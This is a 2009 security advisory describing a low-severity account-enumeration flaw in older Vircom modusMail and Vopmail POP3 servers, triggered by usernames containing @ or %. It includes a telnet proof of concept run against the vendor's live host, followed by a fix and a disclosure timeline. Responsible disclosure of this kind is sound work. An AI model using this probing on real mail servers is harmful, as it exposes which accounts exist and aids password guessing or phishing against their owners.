-------------------------------------------------------------------------------------------- 20091106 - Justanotherhacker.com : Vircom vopmail / modusmail information disclosure JAHx091 - http://www.justanotherhacker.com/advisories/JAHx091.txt -------------------------------------------------------------------------------------------- modusMail All in one email security solution The modusMailâ„¢ mail server provides all-in-one email services, messaging security and spam protection. [ Taken from: http://www.vircom.com/en/products/modusmail/ ] --- Vulnerability description --- A conditional information disclosure exists in older versions of modusMail and Vopmail that will disclose whether an email account exists or not. The disclosure is conditional upon the presence of a @ or % character in the username. This is usually used when one mail system is responsible for the email of several domains. If the @ or % character was not present in the username the pop3 server would request a password before rejecting the login, as opposed to aborting the login attempt after receiving the user portion of the login. Discovered by: Eldar "Wireghoul" Marcussen Type: Information disclosure Severity: Low Release: Responsible CVE: None Vendor: Vircom - http://www.vircom.com Affected versions: Modus mail <= 4.4.491 Probably all versions of Vopmail --- Proof of Concept --- ~$ telnet pop.vircom.com 110 Trying 64.18.73.12... Connected to gate.vircom.com. Escape character is '^]'. +OK modusMail POP3 Server 4.4.491.0 Ready <37819600.1156428713.245@vircom.com> user nosuchuserhere +OK nosuchuserhere is welcome here quit +OK vircom.com POP3 server signing off (mailbox empty) Connection closed by foreign host. ~$ telnet pop.vircom.com 110 Trying 64.18.73.12... Connected to gate.vircom.com. Escape character is '^]'. +OK modusMail POP3 Server 4.4.491.0 Ready <36899224.1156429893.504@vircom.com> user nosuchuser@nosuchhost.com -ERR nosuchuser@nosuchhost.com not known user nosuchuser%nosuchhost.com -ERR nosuchuser%nosuchhost.com not known quit +OK vircom.com POP3 server signing off (mailbox empty) Connection closed by foreign host. --- Solution --- Upgrade to a more recent version --- Disclosure time line --- 06-Nov-2009 - Public disclosure 15-Sep-2006 - New version of modusMail mitigate this 20-Aug-2006 - Vendor acknowledge vulnerability 19-Aug-2006 - Vendor notified through email